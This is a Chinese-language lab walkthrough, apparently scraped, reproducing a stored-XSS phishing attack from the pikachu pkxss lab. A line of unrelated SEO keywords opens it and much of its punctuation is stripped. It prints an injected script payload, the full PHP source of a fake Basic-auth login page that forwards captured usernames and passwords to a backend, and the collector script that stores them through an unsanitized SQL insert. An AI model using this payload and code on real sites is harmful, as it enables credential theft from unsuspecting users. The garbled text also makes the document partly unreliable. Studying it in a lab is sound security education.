做专题页的背景网站,2023年楼市将迎来抛售潮,凡科网站案例,wordpress获取自定义分类名一、复现过程
1、payload
script srchttp://127.0.0.1/pkxss/xfish/fish.php/script
将这段代码插入到含有储存xss的网页上#xff0c;如下留言板 2、此时恶意代码已经存入数据库#xff0c;并存在网页中#xff0c;当另一个用户打开这个网页…一、复现过程
1、payload
script srchttp://127.0.0.1/pkxss/xfish/fish.php/script
将这段代码插入到含有储存xss的网页上如下留言板 2、此时恶意代码已经存入数据库并存在网页中当另一个用户打开这个网页时就会触发xss恶意代码被跳转的另一个页面并弹出登入框 3、这个时候如果输入账号密码就会被恶意构造的后台窃取储存 二、分析流程
1、fish.php文件源码分析这是恶意构造的页面即恶意插入xss代码中的url127.0.0.1/pkxss/xfish/fish.php
即复现步骤2的恶意构造登入页面的源码 这是一个basic认证你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面 ?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER[PHP_AUTH_USER])) || (!isset($_SERVER[PHP_AUTH_PW]))) {
//发送认证框并给出迷惑性的infoheader(Content-type:text/html;charsetutf-8);header(WWW-Authenticate: Basic realm认证);header(HTTP/1.0 401 Unauthorized);echo Authorization Required.;exit;
} else if ((isset($_SERVER[PHP_AUTH_USER])) (isset($_SERVER[PHP_AUTH_PW]))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IPheader(Location: http://127.0.0.1/pkxss/xfish/xfish.php?username{$_SERVER[PHP_AUTH_USER]}password{$_SERVER[PHP_AUTH_PW]});
}?
2、xfish.php他会获取到传入过来的账号密并将这些存入数据库
?php
error_reporting(0);
include_once ../inc/config.inc.php;
include_once ../inc/mysql.inc.php;
$linkconnect();if(!empty($_GET[username]) !empty($_GET[password])){$username$_GET[username];$password$_GET[password];$referer;$referer.$_SERVER[HTTP_REFERER];$timedate(Y-m-d g:i:s);$queryinsert fish(time,username,password,referer) values($time,$username,$password,$referer);$resultmysqli_query($link, $query);
}? 总结
1、在含有xss漏洞页面插入一个一个恶意script代码代码会触发跳转页到恶意页面